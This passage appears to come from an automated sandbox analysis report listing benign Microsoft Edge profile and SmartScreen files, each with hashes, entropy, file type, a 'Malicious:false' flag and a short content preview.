                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2e1bb.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):56066
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.103039480185279
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:z/Ps+wsI7ynQPGWv/sxtw57VLyMV/YoskFoz:z/0+zI7yn0v/4KxVeZoskG
                                                                                                                                                                                                                                                                                          MD5:B38E93994A4E2C75078628A7A680A657
                                                                                                                                                                                                                                                                                          SHA1:1C2B8C37FE8B8036FEFA863DD15CC9440FC338DC
                                                                                                                                                                                                                                                                                          SHA-256:F3402F2A8B99B50129B48877CC53BB0E9253B9603975D056B23E8F0710D4C569
                                                                                                                                                                                                                                                                                          SHA-512:4EB38CCF7F086C1446B520B036974C5B05DECE1AD648D2C6A913DD8AE0C7F0E7C0703493ED2715FA5A1D6FE71013B3B91FB68C9DEAA9C772CD86D8422E690D7E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF32694.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):56066
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.103039480185279
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:z/Ps+wsI7ynQPGWv/sxtw57VLyMV/YoskFoz:z/0+zI7yn0v/4KxVeZoskG
                                                                                                                                                                                                                                                                                          MD5:B38E93994A4E2C75078628A7A680A657
                                                                                                                                                                                                                                                                                          SHA1:1C2B8C37FE8B8036FEFA863DD15CC9440FC338DC
                                                                                                                                                                                                                                                                                          SHA-256:F3402F2A8B99B50129B48877CC53BB0E9253B9603975D056B23E8F0710D4C569
                                                                                                                                                                                                                                                                                          SHA-512:4EB38CCF7F086C1446B520B036974C5B05DECE1AD648D2C6A913DD8AE0C7F0E7C0703493ED2715FA5A1D6FE71013B3B91FB68C9DEAA9C772CD86D8422E690D7E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3cc0b.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):56066
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.103039480185279
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:z/Ps+wsI7ynQPGWv/sxtw57VLyMV/YoskFoz:z/0+zI7yn0v/4KxVeZoskG
                                                                                                                                                                                                                                                                                          MD5:B38E93994A4E2C75078628A7A680A657
                                                                                                                                                                                                                                                                                          SHA1:1C2B8C37FE8B8036FEFA863DD15CC9440FC338DC
                                                                                                                                                                                                                                                                                          SHA-256:F3402F2A8B99B50129B48877CC53BB0E9253B9603975D056B23E8F0710D4C569
                                                                                                                                                                                                                                                                                          SHA-512:4EB38CCF7F086C1446B520B036974C5B05DECE1AD648D2C6A913DD8AE0C7F0E7C0703493ED2715FA5A1D6FE71013B3B91FB68C9DEAA9C772CD86D8422E690D7E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                          MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                          SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                          SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                          SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):47
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                          MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                          SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                          SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                          SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):35
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                          MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                          SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                          SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                          SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):81
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                          MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                          SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                          SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                          SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):130439
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                          MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                          SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                          SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                          SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                          MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                          SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                          SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                          SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):57
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                          MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                          SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                          SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                          SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):29
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                          MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                          SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                          SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                          SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):575056
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                          MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                          SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                          SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                          SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):460992
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                          MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                          SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                          SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                          SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):9
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                          MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                          SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                          SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
